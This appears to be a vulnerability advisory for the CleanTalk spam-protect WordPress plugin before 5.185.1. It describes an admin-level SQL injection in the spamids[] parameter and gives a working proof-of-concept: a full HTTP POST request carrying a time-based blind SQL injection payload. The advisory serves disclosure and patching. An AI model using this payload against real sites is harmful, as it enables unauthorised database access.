The plugin does not validate ids before using them in a SQL statement, which could lead to SQL injection exploitable by high privilege users such as admin
When deleting a scan logs (/edit-comments.php?page=ct_check_spam_logs), intercept the request and change the spamids[] parameter to 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP) POST /wp-admin/edit-comments.php?page=ct_check_spam_logs HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 120 Origin: http://localhost Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=dd06127571&action;=delete&spamids;%5B%5D=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&action2;=delete
CPE | Name | Operator | Version |
---|---|---|---|
cleantalk-spam-protect | lt | 5.185.1 |